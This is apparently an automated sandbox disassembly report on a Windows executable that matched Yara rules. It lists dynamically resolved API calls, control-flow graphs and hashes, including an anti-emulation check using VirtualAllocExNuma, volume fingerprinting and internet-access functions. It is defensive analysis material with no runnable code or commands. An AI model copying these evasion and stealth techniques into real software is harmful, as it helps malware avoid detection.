                                • Opcode ID: a4fe5464ea983aa9d7dae20eca57bc4344b1ad95bfd82a03624b51d1685950b9
                                • Instruction ID: c5504a45571814a486bf300a29571f0527a5fd47afd2f0efbf2299ea65a2c8e8
                                • Opcode Fuzzy Hash: a4fe5464ea983aa9d7dae20eca57bc4344b1ad95bfd82a03624b51d1685950b9
                                • Instruction Fuzzy Hash: FFF0B4B1A40609EBC700DF98DD49B9EBBBCF704B21F104216FA15E3680DBB8190486A5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00CE6598), ref: 004F66F5
                                • GetProcAddress.KERNEL32(76210000,00CE6798), ref: 004F670D
                                • GetProcAddress.KERNEL32(76210000,00CF9848), ref: 004F6726
                                • GetProcAddress.KERNEL32(76210000,00CF9818), ref: 004F673E
                                • GetProcAddress.KERNEL32(76210000,00CF9860), ref: 004F6756
                                • GetProcAddress.KERNEL32(76210000,00CFD980), ref: 004F676F
                                • GetProcAddress.KERNEL32(76210000,00CEA638), ref: 004F6787
                                • GetProcAddress.KERNEL32(76210000,00CFD9F8), ref: 004F679F
                                • GetProcAddress.KERNEL32(76210000,00CFD968), ref: 004F67B8
                                • GetProcAddress.KERNEL32(76210000,00CFD998), ref: 004F67D0
                                • GetProcAddress.KERNEL32(76210000,00CFD9B0), ref: 004F67E8
                                • GetProcAddress.KERNEL32(76210000,00CE6518), ref: 004F6801
                                • GetProcAddress.KERNEL32(76210000,00CE6858), ref: 004F6819
                                • GetProcAddress.KERNEL32(76210000,00CE6878), ref: 004F6831
                                • GetProcAddress.KERNEL32(76210000,00CE6658), ref: 004F684A
                                • GetProcAddress.KERNEL32(76210000,00CFDB18), ref: 004F6862
                                • GetProcAddress.KERNEL32(76210000,00CFD890), ref: 004F687A
                                • GetProcAddress.KERNEL32(76210000,00CEA7A0), ref: 004F6893
                                • GetProcAddress.KERNEL32(76210000,00CE67D8), ref: 004F68AB
                                • GetProcAddress.KERNEL32(76210000,00CFDA88), ref: 004F68C3
                                • GetProcAddress.KERNEL32(76210000,00CFD950), ref: 004F68DC
                                • GetProcAddress.KERNEL32(76210000,00CFDAA0), ref: 004F68F4
                                • GetProcAddress.KERNEL32(76210000,00CFDB60), ref: 004F690C
                                • GetProcAddress.KERNEL32(76210000,00CE6838), ref: 004F6925
                                • GetProcAddress.KERNEL32(76210000,00CFD878), ref: 004F693D
                                • GetProcAddress.KERNEL32(76210000,00CFDA70), ref: 004F6955
                                • GetProcAddress.KERNEL32(76210000,00CFDAE8), ref: 004F696E
                                • GetProcAddress.KERNEL32(76210000,00CFD938), ref: 004F6986
                                • GetProcAddress.KERNEL32(76210000,00CFD9C8), ref: 004F699E
                                • GetProcAddress.KERNEL32(76210000,00CFD8C0), ref: 004F69B7
                                • GetProcAddress.KERNEL32(76210000,00CFDB00), ref: 004F69CF
                                • GetProcAddress.KERNEL32(76210000,00CFD8A8), ref: 004F69E7
                                • GetProcAddress.KERNEL32(76210000,00CFD9E0), ref: 004F6A00
                                • GetProcAddress.KERNEL32(76210000,00CEFCE8), ref: 004F6A18
                                • GetProcAddress.KERNEL32(76210000,00CFDB30), ref: 004F6A30
                                • GetProcAddress.KERNEL32(76210000,00CFDA28), ref: 004F6A49
                                • GetProcAddress.KERNEL32(76210000,00CE64D8), ref: 004F6A61
                                • GetProcAddress.KERNEL32(76210000,00CFD8D8), ref: 004F6A79
                                • GetProcAddress.KERNEL32(76210000,00CE65B8), ref: 004F6A92
                                • GetProcAddress.KERNEL32(76210000,00CFDA10), ref: 004F6AAA
                                • GetProcAddress.KERNEL32(76210000,00CFDA40), ref: 004F6AC2
                                • GetProcAddress.KERNEL32(76210000,00CE6618), ref: 004F6ADB
                                • GetProcAddress.KERNEL32(76210000,00CE64F8), ref: 004F6AF3
                                • LoadLibraryA.KERNEL32(00CFDA58,004F051F), ref: 004F6B05
                                • LoadLibraryA.KERNEL32(00CFDB48), ref: 004F6B16
                                • LoadLibraryA.KERNEL32(00CFDAB8), ref: 004F6B28
                                • LoadLibraryA.KERNEL32(00CFDAD0), ref: 004F6B3A
                                • LoadLibraryA.KERNEL32(00CFD8F0), ref: 004F6B4B
                                • LoadLibraryA.KERNEL32(00CFD908), ref: 004F6B5D
                                • LoadLibraryA.KERNEL32(00CFD920), ref: 004F6B6F
                                • LoadLibraryA.KERNEL32(00CFDCE0), ref: 004F6B80
                                • GetProcAddress.KERNEL32(751E0000,00CE6258), ref: 004F6B9C
                                • GetProcAddress.KERNEL32(751E0000,00CFDE30), ref: 004F6BB4
                                • GetProcAddress.KERNEL32(751E0000,00CF90B0), ref: 004F6BCD
                                • GetProcAddress.KERNEL32(751E0000,00CFDD40), ref: 004F6BE5
                                • GetProcAddress.KERNEL32(751E0000,00CE6338), ref: 004F6BFD
                                • GetProcAddress.KERNEL32(70150000,00CEA5E8), ref: 004F6C1D
                                • GetProcAddress.KERNEL32(70150000,00CE6418), ref: 004F6C35
                                • GetProcAddress.KERNEL32(70150000,00CEA610), ref: 004F6C4E
                                • GetProcAddress.KERNEL32(70150000,00CFDD58), ref: 004F6C66
                                • GetProcAddress.KERNEL32(70150000,00CFDC68), ref: 004F6C7E
                                • GetProcAddress.KERNEL32(70150000,00CE62F8), ref: 004F6C97
                                • GetProcAddress.KERNEL32(70150000,00CE6438), ref: 004F6CAF
                                • GetProcAddress.KERNEL32(70150000,00CFDE00), ref: 004F6CC7
                                • GetProcAddress.KERNEL32(753A0000,00CE6458), ref: 004F6CE3
                                • GetProcAddress.KERNEL32(753A0000,00CE6478), ref: 004F6CFB
                                • GetProcAddress.KERNEL32(753A0000,00CFDC08), ref: 004F6D14
                                • GetProcAddress.KERNEL32(753A0000,00CFDDE8), ref: 004F6D2C
                                • GetProcAddress.KERNEL32(753A0000,00CE6198), ref: 004F6D44
                                • GetProcAddress.KERNEL32(76310000,00CEA688), ref: 004F6D64
                                • GetProcAddress.KERNEL32(76310000,00CEA7F0), ref: 004F6D7C
                                • GetProcAddress.KERNEL32(76310000,00CFDE18), ref: 004F6D95
                                • GetProcAddress.KERNEL32(76310000,00CE6298), ref: 004F6DAD
                                • GetProcAddress.KERNEL32(76310000,00CE63D8), ref: 004F6DC5
                                • GetProcAddress.KERNEL32(76310000,00CEA778), ref: 004F6DDE
                                • GetProcAddress.KERNEL32(76910000,00CFDBF0), ref: 004F6DFE
                                • GetProcAddress.KERNEL32(76910000,00CE6398), ref: 004F6E16
                                • GetProcAddress.KERNEL32(76910000,00CF92A0), ref: 004F6E2F
                                • GetProcAddress.KERNEL32(76910000,00CFDC80), ref: 004F6E47
                                • GetProcAddress.KERNEL32(76910000,00CFDD28), ref: 004F6E5F
                                • GetProcAddress.KERNEL32(76910000,00CE6218), ref: 004F6E78
                                • GetProcAddress.KERNEL32(76910000,00CE6238), ref: 004F6E90
                                • GetProcAddress.KERNEL32(76910000,00CFDE60), ref: 004F6EA8
                                • GetProcAddress.KERNEL32(76910000,00CFDB78), ref: 004F6EC1
                                • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 004F6ED7
                                • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 004F6EEE
                                • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 004F6F05
                                • GetProcAddress.KERNEL32(75B30000,00CE6498), ref: 004F6F21
                                • GetProcAddress.KERNEL32(75B30000,00CFDC38), ref: 004F6F39
                                • GetProcAddress.KERNEL32(75B30000,00CFDD70), ref: 004F6F52
                                • GetProcAddress.KERNEL32(75B30000,00CFDD88), ref: 004F6F6A
                                • GetProcAddress.KERNEL32(75B30000,00CFDD10), ref: 004F6F82
                                • GetProcAddress.KERNEL32(75670000,00CE62D8), ref: 004F6F9E
                                • GetProcAddress.KERNEL32(75670000,00CE6378), ref: 004F6FB6
                                • GetProcAddress.KERNEL32(76AC0000,00CE63B8), ref: 004F6FD2
                                • GetProcAddress.KERNEL32(76AC0000,00CFDC98), ref: 004F6FEA
                                • GetProcAddress.KERNEL32(6F4E0000,00CE6278), ref: 004F700A
                                • GetProcAddress.KERNEL32(6F4E0000,00CE6118), ref: 004F7022
                                • GetProcAddress.KERNEL32(6F4E0000,00CE63F8), ref: 004F703B
                                • GetProcAddress.KERNEL32(6F4E0000,00CFDCF8), ref: 004F7053
                                • GetProcAddress.KERNEL32(6F4E0000,00CE64B8), ref: 004F706B
                                • GetProcAddress.KERNEL32(6F4E0000,00CE61B8), ref: 004F7084
                                • GetProcAddress.KERNEL32(6F4E0000,00CE6178), ref: 004F709C
                                • GetProcAddress.KERNEL32(6F4E0000,00CE6318), ref: 004F70B4
                                • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 004F70CB
                                • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 004F70E2
                                • GetProcAddress.KERNEL32(75AE0000,00CFDCB0), ref: 004F70FE
                                • GetProcAddress.KERNEL32(75AE0000,00CF91C0), ref: 004F7116
                                • GetProcAddress.KERNEL32(75AE0000,00CFDDB8), ref: 004F712F
                                • GetProcAddress.KERNEL32(75AE0000,00CFDC50), ref: 004F7147
                                • GetProcAddress.KERNEL32(76300000,00CE6138), ref: 004F7163
                                • GetProcAddress.KERNEL32(6E9C0000,00CFDDA0), ref: 004F717F
                                • GetProcAddress.KERNEL32(6E9C0000,00CE6158), ref: 004F7197
                                • GetProcAddress.KERNEL32(6E9C0000,00CFDBD8), ref: 004F71B0
                                • GetProcAddress.KERNEL32(6E9C0000,00CFDDD0), ref: 004F71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 51b28a94928eaa8ee1e6f7b4fd9ee75788c1bacab5202937d368c589c0a35466
                                • Instruction ID: fb1bd5c1635974448ccc5b03dc51345d12f0a630c516874f5252dd6abd572340
                                • Opcode Fuzzy Hash: 51b28a94928eaa8ee1e6f7b4fd9ee75788c1bacab5202937d368c589c0a35466
                                • Instruction Fuzzy Hash: 016230B5611206DFD794DF64EC88A2637B9F788341710CB19EA95C3362EF7CA840DB29
                                APIs
                                • lstrlen.KERNEL32(004FCFEC), ref: 004EF1D5
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF1F1
                                • lstrlen.KERNEL32(004FCFEC), ref: 004EF1FC
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF215
                                • lstrlen.KERNEL32(004FCFEC), ref: 004EF220
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF239
                                • lstrcpy.KERNEL32(00000000,00504FA0), ref: 004EF25E
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF28C
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF2C0
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF2F0
                                • lstrlen.KERNEL32(00CE6578), ref: 004EF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 7cd5fe582a13e5f935c1799decc2be24543256f1b71d55d2a4c1719b706e0c15
                                • Instruction ID: b28e6cce474c471ea41a082861f016baf31c7c44de1c2eaf6766bbe1a9920061
                                • Opcode Fuzzy Hash: 7cd5fe582a13e5f935c1799decc2be24543256f1b71d55d2a4c1719b706e0c15
                                • Instruction Fuzzy Hash: 22A26C70A01246DFCB20DF66C958A5BBBB4AF44305F1881BBE849DB362DB39DC45CB58
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0013
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F00BD
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F00E1
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F00EC
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0110
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F011B
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F013F
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F015A
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0189
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F0194
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F01C3
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F01CE
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0206
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F0250
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F059B
                                • lstrlen.KERNEL32(00CE6738), ref: 004F05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 004F05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F060E
                                • lstrlen.KERNEL32(00CFF360), ref: 004F0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F064C
                                • lstrcat.KERNEL32(00000000,?), ref: 004F0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F0681
                                • lstrlen.KERNEL32(00CE67B8), ref: 004F0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 004F06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F0706
                                • lstrcpy.KERNEL32(00000000,00CF9170), ref: 004F074B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F077F
                                • lstrcpy.KERNEL32(00000000,00CFF0D8), ref: 004F07E7
                                • lstrcpy.KERNEL32(00000000,00CF9300), ref: 004F0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 004F08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F0928
                                • lstrcpy.KERNEL32(00000000,00CF9330), ref: 004F09F8
                                  • Part of subcall function 004D24E0: lstrcpy.KERNEL32(00000000,?), ref: 004D2528
                                  • Part of subcall function 004D24E0: lstrcpy.KERNEL32(00000000,?), ref: 004D254E
                                  • Part of subcall function 004D24E0: lstrcpy.KERNEL32(00000000,?), ref: 004D2577
                                • lstrcpy.KERNEL32(00000000,00CF9400), ref: 004F0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F0B81
                                • lstrcpy.KERNEL32(00000000,00CF9400), ref: 004F0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 4638a827c1dd50bdb34472b441cf537f8fd339e3440d9726bb6559ee7e0e4751
                                • Instruction ID: 51b53fe32c33c268bad1c26248ca31275c8a8146534b088d972f47a184dc6d7d
                                • Opcode Fuzzy Hash: 4638a827c1dd50bdb34472b441cf537f8fd339e3440d9726bb6559ee7e0e4751
                                • Instruction Fuzzy Hash: 07E27A70A05345CFD724DF2AC598B6AB7E0BF88304F58856FD58D8B362DB399841CB4A
                                APIs
                                • lstrlen.KERNEL32(00CE6578), ref: 004EF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EF47B
                                • lstrcpy.KERNEL32(00000000,00CE6578), ref: 004EF4BB
                                • lstrcpy.KERNEL32(00000000,00CF91B0), ref: 004EF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004EF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 004EF718
                                • lstrlen.KERNEL32(00CF9280), ref: 004EF746
                                • lstrcpy.KERNEL32(00000000,00CF9280), ref: 004EF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 004EFA32
                                • lstrlen.KERNEL32(00CF9220), ref: 004EFA60
                                • lstrcpy.KERNEL32(00000000,00CF9220), ref: 004EFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: d33f4de970952d94e1a90d2f8a5ee7123e3ef8f2993f7f8082ac0a5edb5e4210
                                • Instruction ID: 739bf3a1807ea45220ab5189ac7865964d31fb12f0aec52afbeb75cbb96f867f
                                • Opcode Fuzzy Hash: d33f4de970952d94e1a90d2f8a5ee7123e3ef8f2993f7f8082ac0a5edb5e4210
                                • Instruction Fuzzy Hash: 6FF15170A01246CFDB24DF66C954A16B7E5BF44316B18C1BFD8099B3A2EB39DC46CB48

                                Control-flow Graph

                                control_flow_graph 2721 4e8ca0-4e8cc4 StrCmpCA 2722 4e8ccd-4e8ce6 2721->2722 2723 4e8cc6-4e8cc7 ExitProcess 2721->2723 2725 4e8cec-4e8cf1 2722->2725 2726 4e8ee2-4e8eef call 4d2a20 2722->2726 2727 4e8cf6-4e8cf9 2725->2727 2729 4e8cff 2727->2729 2730 4e8ec3-4e8edc 2727->2730 2732 4e8e6f-4e8e7d StrCmpCA 2729->2732 2733 4e8e88-4e8e9a lstrlen 2729->2733 2734 4e8d06-4e8d15 lstrlen 2729->2734 2735 4e8d84-4e8d92 StrCmpCA 2729->2735 2736 4e8da4-4e8db8 StrCmpCA 2729->2736 2737 4e8dbd-4e8dcb StrCmpCA 2729->2737 2738 4e8ddd-4e8deb StrCmpCA 2729->2738 2739 4e8dfd-4e8e0b StrCmpCA 2729->2739 2740 4e8e1d-4e8e2b StrCmpCA 2729->2740 2741 4e8e3d-4e8e4b StrCmpCA 2729->2741 2742 4e8d5a-4e8d69 lstrlen 2729->2742 2743 4e8e56-4e8e64 StrCmpCA 2729->2743 2744 4e8d30-4e8d3f lstrlen 2729->2744 2730->2726 2770 4e8cf3 2730->2770 2732->2730 2754 4e8e7f-4e8e86 2732->2754 2755 4e8e9c-4e8ea1 call 4d2a20 2733->2755 2756 4e8ea4-4e8eb0 call 4d2930 2733->2756 2750 4e8d1f-4e8d2b call 4d2930 2734->2750 2751 4e8d17-4e8d1c call 4d2a20 2734->2751 2735->2730 2745 4e8d98-4e8d9f 2735->2745 2736->2730 2737->2730 2746 4e8dd1-4e8dd8 2737->2746 2738->2730 2747 4e8df1-4e8df8 2738->2747 2739->2730 2748 4e8e11-4e8e18 2739->2748 2740->2730 2749 4e8e31-4e8e38 2740->2749 2741->2730 2752 4e8e4d-4e8e54 2741->2752 2759 4e8d6b-4e8d70 call 4d2a20 2742->2759 2760 4e8d73-4e8d7f call 4d2930 2742->2760 2743->2730 2753 4e8e66-4e8e6d 2743->2753 2757 4e8d49-4e8d55 call 4d2930 2744->2757 2758 4e8d41-4e8d46 call 4d2a20 2744->2758 2745->2730 2746->2730 2747->2730 2748->2730 2749->2730 2779 4e8eb3-4e8eb5 2750->2779 2751->2750 2752->2730 2753->2730 2754->2730 2755->2756 2756->2779 2757->2779 2758->2757 2759->2760 2760->2779 2770->2727 2779->2730 2780 4e8eb7-4e8eb9 2779->2780 2780->2730 2781 4e8ebb-4e8ebd lstrcpy 2780->2781 2781->2730
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 7a6fb696d9192006034c366d7c587a5ac2ebbcbc70648c211b23d8f612dd3389
                                • Instruction ID: 1d0422eb3f01d10e511988b3d6bb2b6de5733e49df0b4380bd6d33cb211e758d
                                • Opcode Fuzzy Hash: 7a6fb696d9192006034c366d7c587a5ac2ebbcbc70648c211b23d8f612dd3389
                                • Instruction Fuzzy Hash: 925192B0A04782DBDB209F7ADD84A2B7BF4BF14706B10485EE58AD2761DF7CD4418B19

                                Control-flow Graph

                                control_flow_graph 2782 4f2740-4f2783 GetWindowsDirectoryA 2783 4f278c-4f27ea GetVolumeInformationA 2782->2783 2784 4f2785 2782->2784 2785 4f27ec-4f27f2 2783->2785 2784->2783 2786 4f2809-4f2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 4f27f4-4f2807 2785->2787 2788 4f2826-4f2844 wsprintfA 2786->2788 2789 4f2822-4f2824 2786->2789 2787->2785 2790 4f285b-4f2872 call 4f71e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 004F277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,004E93B6,00000000,00000000,00000000,00000000), ref: 004F27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F2816
                                • wsprintfA.USER32 ref: 004F283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: 3b8a43bcd0964ca1f6fa24311dbce568bf4faad042796ad5f63d980754678aa7
                                • Instruction ID: b5a0d6c1bbb2bbdf9ed33d3a2ec05d4635279d8aed5fbf0132998a359049c128
                                • Opcode Fuzzy Hash: 3b8a43bcd0964ca1f6fa24311dbce568bf4faad042796ad5f63d980754678aa7
                                • Instruction Fuzzy Hash: 8A3176B1D042099BCB04DFB88A859EFFFBCEF58750F10416AE505F7650E6789A4087A6

                                Control-flow Graph

                                control_flow_graph 2793 4d4bc0-4d4bce 2794 4d4bd0-4d4bd5 2793->2794 2794->2794 2795 4d4bd7-4d4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 4d2a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 004D4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004D4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004D4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 004D4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 004D4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: e68a85b3f2c494513e131ac44342e0270a0bdaf68382829554fe7d17f7d9581f
                                • Instruction ID: 0560c946108b28da1727af2c004090d72feb12cb8f34a6ce14345b7550879ff6
                                • Opcode Fuzzy Hash: e68a85b3f2c494513e131ac44342e0270a0bdaf68382829554fe7d17f7d9581f
                                • Instruction Fuzzy Hash: 1B011B71D00218ABDB50DFA9EC45B9EBBA8EB58324F00812AF954E7390DF7459058BD5

                                Control-flow Graph

                                control_flow_graph 2798 4d1030-4d1055 GetCurrentProcess VirtualAllocExNuma 2799 4d105e-4d107b VirtualAlloc 2798->2799 2800 4d1057-4d1058 ExitProcess 2798->2800 2801 4d107d-4d1080 2799->2801 2802 4d1082-4d1088 2799->2802 2801->2802 2803 4d108a-4d10ab VirtualFree 2802->2803 2804 4d10b1-4d10b6 2802->2804 2803->2804
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004D1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 004D104D
                                • ExitProcess.KERNEL32 ref: 004D1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004D106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004D10AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: b0b24f8f631bb5b57ee9b802a230fc9a6da5955babe1c31717ba3b636d5b9e84
                                • Instruction ID: 473b64032df6601e915323a773b0f4e4211c86b610de55f61ba0fb8b0030a3cb
                                • Opcode Fuzzy Hash: b0b24f8f631bb5b57ee9b802a230fc9a6da5955babe1c31717ba3b636d5b9e84
                                • Instruction Fuzzy Hash: B101D171780204BBE7205A656C1AF6B77A9A785B01F208116FB44E7390DDB9E9008668

                                Control-flow Graph

                                control_flow_graph 2805 4eee90-4eeeb5 call 4d2930 2808 4eeec9-4eeecd call 4d6c40 2805->2808 2809 4eeeb7-4eeebf 2805->2809 2812 4eeed2-4eeee8 StrCmpCA 2808->2812 2809->2808 2810 4eeec1-4eeec3 lstrcpy 2809->2810 2810->2808 2813 4eeeea-4eef02 call 4d2a20 call 4d2930 2812->2813 2814 4eef11-4eef18 call 4d2a20 2812->2814 2824 4eef04-4eef0c 2813->2824 2825 4eef45-4eefa0 call 4d2a20 * 10 2813->2825 2819 4eef20-4eef28 2814->2819 2819->2819 2821 4eef2a-4eef37 call 4d2930 2819->2821 2821->2825 2830 4eef39 2821->2830 2824->2825 2826 4eef0e-4eef0f 2824->2826 2829 4eef3e-4eef3f lstrcpy 2826->2829 2829->2825 2830->2829
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 004EEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 004EEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: b6a6924add9ad6d92c40b8a4425cc57aef110ddf2587e338f4174c41d2dafe42
                                • Instruction ID: f99ff4a4842b045ca9bb237f9182710aa8672ba2967e8069b10e95160d0dc6ec
                                • Opcode Fuzzy Hash: b6a6924add9ad6d92c40b8a4425cc57aef110ddf2587e338f4174c41d2dafe42
